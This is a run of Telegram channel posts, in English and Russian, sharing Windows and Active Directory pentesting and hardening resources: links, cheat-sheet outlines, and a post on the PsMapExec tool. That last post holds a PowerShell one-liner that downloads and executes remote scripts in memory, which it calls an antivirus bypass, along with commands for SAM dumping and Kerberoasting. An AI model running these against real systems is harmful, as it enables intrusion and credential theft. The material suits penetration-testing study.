Forwarded from infosecurity
WinPwn - Automation for internal Windows Penetration Testing. WinPwn is an powershell script that help you to Automation for internal Windows Penetration testing. Only use for educational purposes — https://securityonline.info/automation-internal-windows-penetration-testing/ #Windows #pentest #audit
securityonline.info
WinPwn v1.6 releases: Automation for internal Windows Penetration Testing
WinPwn is an powershell script that help you to Automation for internal Windows Penetration testing. Only use for educational purposes.
Windows Command Line Cheat Sheet.
The purpose of this cheat sheet is to provide tips on how to use various Windows commands that are frequently referenced in SANS 504, 517, 531, and 560.
https://sansorg.egnyte.com/dl/AvZo1dS7kI/?
#Windows #CheatSheet
The purpose of this cheat sheet is to provide tips on how to use various Windows commands that are frequently referenced in SANS 504, 517, 531, and 560.
https://sansorg.egnyte.com/dl/AvZo1dS7kI/?
#Windows #CheatSheet
Egnyte
235.pdf on Egnyte
File 235.pdf shared using Egnyte
Windows auditing mindmap.
Windows auditing mindmap provides a simplified view of Windows Event logs and auditing capacities that enables defenders to enhance visibility for different purposes:
• Log collection (eg: into a SIEM);
• Threat hunting;
• Forensic / DFIR;
• Troubleshooting.
🧷 https://github.com/mdecrevoisier/Windows-auditing-mindmap
#mindmap #Blue_Team
Windows auditing mindmap provides a simplified view of Windows Event logs and auditing capacities that enables defenders to enhance visibility for different purposes:
• Log collection (eg: into a SIEM);
• Threat hunting;
• Forensic / DFIR;
• Troubleshooting.
🧷 https://github.com/mdecrevoisier/Windows-auditing-mindmap
#mindmap #Blue_Team
GitHub
GitHub - mdecrevoisier/Microsoft-eventlog-mindmap: Set of Mindmaps providing a detailed overview of the different #Microsoft auditing…
Set of Mindmaps providing a detailed overview of the different #Microsoft auditing capacities for Windows, Exchange, Azure,... - mdecrevoisier/Microsoft-eventlog-mindmap
Msfvenom Cheatsheet: Windows Exploitation.
https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/
#Metasploit #Cheatsheet #Windows
https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/
#Metasploit #Cheatsheet #Windows
Windows auditing mindmap.png
1 MB
Windows auditing mindmap.
• Windows auditing mindmap provides a simplified view of Windows Event logs and auditing capacities that enables defenders to enhance visibility for different purposes:
https://github.com/mdecrevoisier/Windows-auditing-mindmap
#mindmap #Windows
• Windows auditing mindmap provides a simplified view of Windows Event logs and auditing capacities that enables defenders to enhance visibility for different purposes:
• Log collection (eg: into a SIEM).• Threat hunting.• Forensic / DFIR.• Troubleshooting.https://github.com/mdecrevoisier/Windows-auditing-mindmap
#mindmap #Windows
Forwarded from SHADOW:Group
Прослушал интересный голосовой стрим по теме Red Team операций, где обсуждали полный путь от физического доступа до получения административных прав.
Выполнено все в формате собеседования, что позволило задать каверзные вопросы и обсудить возможные проблемы, которые могут возникнуть на вашем пути, а также способы их решения. Рекомендую к ознакомлению.
https://t.me/RedTeambro/92
#redteam #windows #ad
Выполнено все в формате собеседования, что позволило задать каверзные вопросы и обсудить возможные проблемы, которые могут возникнуть на вашем пути, а также способы их решения. Рекомендую к ознакомлению.
https://t.me/RedTeambro/92
#redteam #windows #ad
Telegram
RedTeam brazzers
Провели ламповую встречу, поговорили про внутряки и редтимы в формате собеседования. Подписчик @CuriV любезно предоставил аудио-запись встречи, если кто пропустил, то можно послушать.
Forwarded from Волосатый бублик
#windows #lpe #bruteforce
P.S. Хорошо забытое старое. Все просто и понятно, но думаю на ум приходит в последний момент. Надо будет где-то попробовать.https://github.com/DarkCoderSc/win-brute-logon
4 vCPU -> ~ 600P/s
20 vCPU -> ~ 600P/s (почему-то та же скорость)
Cорость так себе, но когда другого пути нет то почему бы и ДА
GitHub
GitHub - PhrozenIO/win-brute-logon: Crack any Microsoft Windows users password without any privilege (Guest account included)
Crack any Microsoft Windows users password without any privilege (Guest account included) - PhrozenIO/win-brute-logon
Forwarded from infosec
Windows Privileges HD.png
3.1 MB
• Here is a collection of some really cool PowerShell one-liners scripts. I find them very useful for day-to-day system administration tasks. I will keep adding to this list as I learn more useful commands.
• List of all installed applications on a Windows device;
• Get all installed KB numbers from Windows Update;
• Find Admin Shares on my computer;
• Find Scheduled tasks that are running;
• Find files;
• Find the Last Bootup Time;
• Free Disk space information;
• Find out how big a folder is;
• Active Directory Bulk Add Users;
• Extract all unique IP addresses from a log file and display the top 10 most frequently occurring ones;
• Monitor a folder for changes and send an email notification whenever a new file is created;
• Create a report of all mailbox sizes in an Exchange server and export it to a CSV file;
• Monitor a website for availability and send an email notification whenever it goes down;
• Find all the processes that are using a specific port;
• Create a script that retrieves the latest tweets from a list of Twitter users and sends an email notification.
#Powershell #Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
• Эксплуатация представляет собой последовательность действий, которая помогает атакующему получить доступ к исследуемой системе, используя уязвимость или ошибку в настройках.
• Делюсь ссылками на полезный справочник для эксплуатации win #AD, который включает в себя следующую информацию:
• Обход PowerShell AMSI;
• PowerShell one-liners;
• Перечисления (Enumeration);
• AD Enumeration с помощью PowerView;
• AppLocker;
• Ограниченный языковой режим PowerShell;
• LAPS;
• Боковое перемещение (Lateral Movement);
• Боковое перемещение с помощью PowerView;
• BloodHound;
• Kerberoasting;
• AS-REP roasting;
• Token Manipulation;
• Боковое перемещение с помощью Rubeus;
• Боковое перемещение с помощью Mimikatz;
• Выполнение команды с запланированными задачами;
• Выполнение команд с помощью WMI;
• Выполнение команд с помощью PowerShell Remoting;
• Неограниченное делегирование;
• Ограниченное делегирование;
• Ограниченное делегирование на основе ресурсов;
• Злоупотребление доверием к домену;
• MSSQL и боковое перемещение;
• Групповые политики и боковое перемещение;
• Privilege Escalation;
• PowerUp;
• UAC Bypass;
• Persistence;
• Startup folder;
• Domain Persistence;
• Mimikatz skeleton key attack;
• Права DCSync с помощью PowerView;
• Domain Controller DSRM admin;
• Изменение дескрипторов безопасности для удаленного доступа к WMI;
• Изменение дескрипторов безопасности для удаленного доступа PowerShell;
• Изменение дескрипторов безопасности реестра DC для удаленного извлечения хэша с помощью DAMP;
• DCShadow;
• Постэксплуатация;
• LSASS protection;
• Дамп учетных данных с помощью Mimikatz;
• Злоупотребление DPAPI с помощью Mimikatz;
• Dumping secrets without Mimikatz;
• Windows Defender evasion;
• Chisel proxying;
• Juicy files;
#AD #Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
• Эксплуатация представляет собой последовательность действий, которая помогает атакующему получить доступ к исследуемой системе, используя уязвимость или ошибку в настройках. Сегодня, я поделюсь с тобой ссылкой на отличный Cheat Sheet для эксплуатации win #AD.
Что включает в себя справочник:
• Обход PowerShell AMSI;
• PowerShell one-liners;
• Перечисления (Enumeration);
• AD Enumeration с помощью PowerView;
• AppLocker;
• Ограниченный языковой режим PowerShell;
• LAPS;
• Боковое перемещение (Lateral Movement);
• Боковое перемещение с помощью PowerView;
• BloodHound;
• Kerberoasting;
• AS-REP roasting;
• Token Manipulation;
• Боковое перемещение с помощью Rubeus;
• Боковое перемещение с помощью Mimikatz;
• Выполнение команды с запланированными задачами;
• Выполнение команд с помощью WMI;
• Выполнение команд с помощью PowerShell Remoting;
• Неограниченное делегирование;
• Ограниченное делегирование;
• Ограниченное делегирование на основе ресурсов;
• Злоупотребление доверием к домену;
• MSSQL и боковое перемещение;
• Групповые политики и боковое перемещение;
• Privilege Escalation;
• PowerUp;
• UAC Bypass;
• Persistence;
• Startup folder;
• Domain Persistence;
• Mimikatz skeleton key attack;
• Права DCSync с помощью PowerView;
• Domain Controller DSRM admin;
• Изменение дескрипторов безопасности для удаленного доступа к WMI;
• Изменение дескрипторов безопасности для удаленного доступа PowerShell;
• Изменение дескрипторов безопасности реестра DC для удаленного извлечения хэша с помощью DAMP;
• DCShadow;
• Постэксплуатация;
• LSASS protection;
• Дамп учетных данных с помощью Mimikatz;
• Злоупотребление DPAPI с помощью Mimikatz;
• Dumping secrets without Mimikatz;
• Windows Defender evasion;
• Chisel proxying;
• Juicy files.
#AD #ИБ #Hack
Please open Telegram to view this post
VIEW IN TELEGRAM
• На хабре опубликована полезная статья, в которой вы найдете полезные скрипты, советы и reg-файлы для отключения обновления, синхронизаций, телеметрии и т.д.
• А если вы используете Windows 11, Win Server 2016 или 2019, то вот вам инструкция от майков: https://learn.microsoft.com/
• P.S. Всегда помните, что любые попытки отключения сетевых возможностей ОС Windows 10 приводят к проблемам. Перечисленные способы не исключение.
• Правильная стратегия «затыкания рта Windows» должна быть следующей:
- Полностью обновить ОС.
- Инсталляция и настройка требуемых сторонних программ.
- Отключение «паразитного» сетевого трафика.
#Windows #Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
• Огромная коллекция различного материала на тему усиления безопасности. От подробных гайдов до необходимых инструментов и бенчмарков:
• Security Hardening Guides and Best Practices;
— Hardening Guide Collections;
— GNU/Linux;
- Red Hat Enterprise Linux - RHEL;
- CentOS;
- SUSE;
- Ubuntu;
— Windows;
— macOS;
— Network Devices;
- Switches;
- Routers;
- IPv6;
- Firewalls;
— Virtualization - VMware;
— Containers - Docker - Kubernetes;
— Services;
- SSH;
- TLS/SSL;
- Web Servers;
- Mail Servers;
- FTP Servers;
- Database Servers;
- Active Directory;
- ADFS;
- Kerberos;
- LDAP;
- DNS;
- NTP;
- NFS;
- CUPS;
— Authentication - Passwords;
— Hardware - CPU - BIOS - UEFI;
— Cloud;
• Tools;
— Tools to check security hardening;
- GNU/Linux;
- Windows;
- Network Devices;
- TLS/SSL;
- SSH;
- Hardware - CPU - BIOS - UEFI;
- Docker;
- Cloud;
— Tools to apply security hardening;
- GNU/Linux;
- Windows;
- TLS/SSL;
- Cloud;
— Password Generators;
• Books;
• Other Awesome Lists;
— Other Awesome Security Lists.
#ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Pentest HaT 🎩 (Андрей (Exited3n))
Отличный инструмент для пост эксплуатации
UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF
Текущая поддержка методов (протоколов):
Реализованные модули:
Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
▪️ Documentation
#soft #pentest #powershell #psmapexec #activedirectory #windows
Please open Telegram to view this post
VIEW IN TELEGRAM